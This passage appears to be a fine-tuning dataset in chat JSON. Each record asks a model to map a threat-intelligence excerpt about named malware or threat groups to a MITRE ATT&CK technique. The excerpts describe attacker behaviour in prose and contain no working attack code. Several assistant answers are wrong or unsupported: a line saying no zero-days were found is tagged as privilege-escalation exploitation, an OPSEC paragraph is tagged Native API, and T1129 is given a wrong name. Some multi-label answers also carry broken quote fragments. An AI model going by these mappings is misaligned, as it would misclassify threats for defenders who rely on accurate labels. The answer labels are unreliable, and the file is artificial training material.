- "content": "X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. Antivirus detection for HttpBrowser is extremely low and is typically based upon heuristic signatures. DLL side loading has been used to maintain persistence on the compromised system. More information about HttpBrowser is available in Appendix B. HttpBrowser URI. Source: Dell SecureWorks) - ChinaChopper web shell — A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. ChinaChopper web shell. shown in Figure 4, are required to interact with the web shell"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cisco Talos assesses with moderate confidence that a campaign we recently discovered called \"BlackWater\" is associated with suspected persistent threat actor MuddyWater. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs. In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field"
- },
- {
- "role": "assistant",
- "content": "T1104 - Multi-Stage Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used to launch an authentication window for users to enter their credentials."
- },
- {
- "role": "assistant",
- "content": "T1187 - Forced Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos uses RC4 and base64 to obfuscate data, including Registry entries and file paths."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts as well as to execute their backdoor directly."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Credential hopping for obscuring lateral movement - Office 365 (O365) Service Principal and Application hijacking, impersonation and manipulation - Stealing browser cookies for bypassing multifactor authentication - Use of the TrailBlazer implant and the Linux variant of GoldMax malware - Credential theft using Get-ADReplAccount"
- },
- {
- "role": "assistant",
- "content": "T1078.002 - Domain Accounts', 'T1550.001 - Application Access Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Persistence is maintained through a Run registry key"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CrossRAT is capable of taking screen captures."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "REvil can mimic the names of known executables."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBSRAT can list file and directory information."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Comnie uses \"ipconfig /all\" and \"route PRINT\" to identify network adapter and interface information."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can download files and additional malware components."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JPIN can obtain the permissions of the victim user."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly downloaded tools from a remote server after they were inside the victim network."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally, VALUEVAULT will call Windows PowerShell to extract browser history in order to match browser passwords with visited sites."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "kills security tools like Wireshark that are running."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackTech has used e-mails with malicious documents to lure victims into installing malware."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If that configuration is not available, it utilizes a hardcoded configuration in the binary. The tool uses a custom binary protocol over sockets for its command and control communication with the GUP Proxy Tool and all transferred data is encrypted using a modified version of RC4 encryption"
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkHydrus has obtained and used tools such as Mimikatz, Empire, and Cobalt Strike."
- },
- {
- "role": "assistant",
- "content": "T1588.002 - Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT39 has packed tools with UPX, and has repacked a modified version of Mimikatz to thwart anti-virus detection."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit."
- },
- {
- "role": "assistant",
- "content": "T1595.002 - Vulnerability Scanning"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWiper has the ability to corrupt disk partitions, damage the Master Boot Record (MBR), and overwrite the Master File Table (MFT) of all available physical drives."
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The datasets included: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Script to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems We analyzed each type of dataset other than the documents containing detailed information on alleged OilRig operators and they remain consistent with previously observed OilRig tactics, techniques, and procedures (TTPs)"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The orchestrator is the main component of the Carbon framework. It is mainly used to inject code into a process that communicates legitimately over the Internet and to dispatch the tasks received from the injected library to other computers on the same network either through named pipes or TCP"
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrailBlazer has the ability to use WMI for persistence."
- },
- {
- "role": "assistant",
- "content": "T1546.003 - Event Triggered Execution: Windows Management Instrumentation Event Subscription"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can collect the username from the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads a PowerShell script that decodes to a typical shellcode loader."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The program copies itself as <Hangul full path>HncReporter.exe and changes the default program association in the registry to open HWP documents. To do so, it alters following registry values"
- },
- {
- "role": "assistant",
- "content": "T1546.001 - Event Triggered Execution: Change Default File Association"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkComet has the option to compress its payload using UPX or MPRESS."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A copy of the initial EXE for GuLoader is made persistent, then the original is deleted from the infected user’s AppData\\Local\\Temp directory where it was originally saved. The GuLoader EXE is persistent through the Windows Registry under the following key"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "executes net start after initial communication is made to the remote server."
- },
- {
- "role": "assistant",
- "content": "T1007 - System Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. Instead of having the “UPX. string, it has been replaced with “LSD. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "overwrite or delete MBR in same sentence"
- },
- {
- "role": "assistant",
- "content": "T1561.002 - Disk Structure Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can delete a specified file."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has enumerated hosts, looking to obtain a list of all currently running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTTPBrowser is capable of writing a file to the compromised system from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The PHP malware achieves persistence by adding scheduled tasks on the host to execute daily and at regular intervals. At the same time, a generated TMP file runs a parallel process to launch the stealer component."
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used \"AUDITPOL\" to prevent the collection of audit logs."
- },
- {
- "role": "assistant",
- "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Encrypting communications using AES and RSA public key cryptography 5"
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The C&C domain android[.]viral91[.]xyz, where the malware was connecting to also shows that it is very likely that the APT team uses subdomains to host or connect to Android malware. In previous years, some CrimsonRAT samples were also found to be hosted on the viral91[.]xyz domain."
- },
- {
- "role": "assistant",
- "content": "T1584.001 - Domains', 'T1583.001 - Domains', 'T1587.001 - Malware', 'T1588.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An APT28 loader Trojan will enumerate the victim's processes searching for explorer.exe if its current process does not have necessary permissions."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This recent APT10 activity has included both traditional spear phishing and access to victim’s networks through service providers. For more information on infection via service providers see M-Trends 2016). APT10 spear phishes have been relatively unsophisticated, leveraging .lnk files within archives, files with double extensions (e.g. Redacted]_Group_Meeting_Document_20170222_doc_.exe) and in some cases simply identically named decoy documents and malicious launchers within the same archive"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole can decrypt, unpack and load a DLL from its resources, or from blobs encrypted with Data Protection API, two-key triple DES, and variations of the XOR cipher."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In total, nearly 13,000 sets of credentials are included in the data dump"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Are the attackers using any zero-day vulnerabilities? No zero-day vulnerabilities have been found in the analysis of the samples obtained regarding this campaign"
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloads files onto infected hosts."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro decodes the dropped files using Windows certutil.exe with the following commands (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Green Lambert can use `uname` to identify the operating system name, version, and processor type."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT relies on a specific victim hostname to execute and decrypt important strings."
- },
- {
- "role": "assistant",
- "content": "T1480.001 - Environmental Keying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links."
- },
- {
- "role": "assistant",
- "content": "T1204.001 - Malicious Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Woburn, MA – May 7, 2018 – Kaspersky Lab researchers have discovered a new variant of the SynAck ransomware Trojan using the Doppelgänging technique to bypass anti-virus security by hiding in legitimate processes. The developers behind SynAck also implement other tricks to evade detection and analysis, obfuscating all malware code prior to sample compilation and exiting if signs suggest it is being launched in a sandbox"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IceApple is an IIS post-exploitation framework, consisting of 18 modules that provide several functionalities."
- },
- {
- "role": "assistant",
- "content": "T1505.004 - IIS Components"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can collect data from a local system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As soon as the proof-of-concept (PoC) for CVE-2020-9054 was made publicly available last month, this vulnerability was promptly abused to infect vulnerable versions of Zyxel network-attached storage (NAS) devices with a new Mirai variant – Mukashi."
- },
- {
- "role": "assistant",
- "content": "T1588.006 - Vulnerabilities"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Inception has used VBScript to execute malicious commands and payloads."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "They are known for “living off the land,” meaning they use already available tools and software installed on the computer to operate, and once inside a target network, they will tailor their malware specifically to the target"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 drops a Windows shortcut file for execution."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang has gained access through VPNs including with compromised accounts and stolen VPN certificates."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Pteranodon identifies files matching certain file extension and copies them to subdirectories it created."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once the \"instal.xml\" file began execution, it would deobfuscate the base64-encoded commands. This revealed a stager, or a small script designed to obtain an additional payload. One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. A copy of the deobfuscated stager can be seen in the image below"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BLINDINGCAN has loaded and executed DLLs in memory during runtime on a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1129 - Server Software Component"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can use `cmd.exe` for execution on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Among infostealers used by the Kimsuky group, some samples have been found that use FTP to download additional malware after logging infected targets to the C&C [14, 15"
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript', 'T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While investigating the domains and infrastructure used by the phishing components of Gorgon Group, Unit 42 researchers witnessed several common operational security flaws with Gorgon Group's actors throughout their many campaigns. It was one of these OPSEC failures that gave us an interesting cross-section of malware Gorgon Group is using. Included in the directories were a combination of files leveraged in targeted attacks mentioned above against nation states. Additionally, there was a plethora of malware samples that were criminal in nature"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ABK has the ability to decrypt AES encrypted payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
